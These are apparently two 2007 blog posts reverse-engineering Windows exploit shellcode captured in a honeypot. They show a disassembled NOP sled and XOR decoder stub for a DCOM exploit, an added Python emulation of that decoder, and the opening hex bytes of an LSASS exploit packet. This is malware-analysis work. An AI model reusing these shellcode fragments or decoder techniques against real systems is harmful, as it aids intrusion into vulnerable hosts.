Virus Blog

Reversing Shellcode Part 2

— Posted by zeroq @ 14:11 - 19 Mar, 2007

In this second part we will take a closer look at a more complex, encoded shellcode. This time I received it by emulating the DCOM vulnerability. As the shellcode is encoded we need to find the decoder part first. It usually starts right after the NOP sled.

000004BB 90 nop
000004BC 90 nop
000004BD 90 nop
000004BE 90 nop
000004BF 90 nop
000004C0 90 nop
000004C1 90 nop
000004C2 90 nop
000004C3 90 nop
000004C4 90 nop
000004C5 90 nop
000004C6 EB10 jmp short 0x4d8
000004C8 5A pop edx
000004C9 4A dec edx
000004CA 33C9 xor ecx,ecx
000004CC 66B97601 mov cx,0x176
000004D0 80340A99 xor byte [edx+ecx],0x99
000004D4 E2FA loop 0x4d0
000004D6 EB05 jmp short 0x4dd
000004D8 E8EBFFFFFF call 0x4c8
000004DD 7061 jo 0x540
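To see exactly which bytes the stub above touches, here is an added Python emulation of its loop (not code from the original post). The stub bytes are those in the listing; the 0x176-byte encoded payload placed behind it is constructed for the demo, and the base address 0x4C6 is taken from the listing.

```python
# Added example: replay the jmp/call/pop XOR decoder from the listing on a memory image.
BASE = 0x4C6                      # address of the first stub instruction in the listing
STUB = bytes.fromhex(
    "EB10"          # jmp short -> call
    "5A"            # pop edx        (edx = return address 0x4DD)
    "4A"            # dec edx        (edx = 0x4DC)
    "33C9"          # xor ecx, ecx
    "66B97601"      # mov cx, 0x176  (number of bytes to decode)
    "80340A99"      # xor byte [edx+ecx], 0x99
    "E2FA"          # loop -> xor
    "EB05"          # jmp short -> decoded payload
    "E8EBFFFFFF"    # call -> pop edx (pushes 0x4DD)
)
KEY = 0x99
COUNT = 0x176

def decode(image: bytes, base: int = BASE) -> bytes:
    """Replay the loop. The call at base+0x12 pushes base+0x17 (0x4DD); after
    pop/dec, edx = 0x4DC. `loop` runs the body for ecx = 0x176 down to 1, so
    bytes 0x4DD..0x4DD+0x175 are XORed with 0x99 and the byte at edx is skipped."""
    mem = bytearray(image)
    ret_addr = base + len(STUB)       # 0x4DD, first byte of the encoded payload
    edx = ret_addr - 1
    ecx = COUNT
    while True:
        mem[edx + ecx - base] ^= KEY  # xor byte [edx+ecx], 0x99
        ecx -= 1                      # loop: dec ecx, jump while ecx != 0
        if ecx == 0:
            break
    start = ret_addr - base
    return bytes(mem[start:start + COUNT])

def first_decoded_bytes() -> bytes:
    # The bytes the disassembler showed as `jo 0x540` (70 61) decode to E9 F8;
    # 0xE9 is the opcode of a near jmp, a common first instruction of a decoded payload.
    return bytes(b ^ KEY for b in b"\x70\x61")

def demo() -> bool:
    # Constructed plaintext standing in for the real payload (not from the page).
    plain = b"\xE9\xF8" + bytes(range(256)) + b"\x90" * 116   # exactly 0x176 bytes
    encoded = bytes(b ^ KEY for b in plain)
    return decode(STUB + encoded) == plain
```

Replaying the loop this way recovers the payload for static analysis without executing it; the same routine applies to any jmp/call/pop XOR stub once key, count and offset are read off the listing.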


Reversing Shellcode Part 1

— Posted by zeroq @ 11:33 - 12 Mar, 2007

I have been playing around with different kinds of shellcode for the last couple of days. I received my first piece of shellcode by simulating the famous LSASS vulnerability on a Linux host. The vulnerability comprises a total of six steps until the final shellcode is transmitted, containing information about where to download the additional malware. More details about the vulnerability can be found all around the web or at nepenthes, a low-interaction honeypot for capturing malware binaries.

However, once the shellcode is received one can start taking a closer look at it. The hexadecimal output looks something like this:

"\x00\x00\x00\x9c\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xdc\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x04\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x10\x5c\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5c\x00\x00\x00\x00\x00\x05\x00\x0b\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x6a\x28\x19\x39\x0c\xb1\xd0\x11"
"\x9b\xa8\x00\xc0\x4f\xd9\x2e\xf5\x00\x00\x00\x00\x04\x5d\x88\x8a"
"\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60\x02\x00\x00\x00"

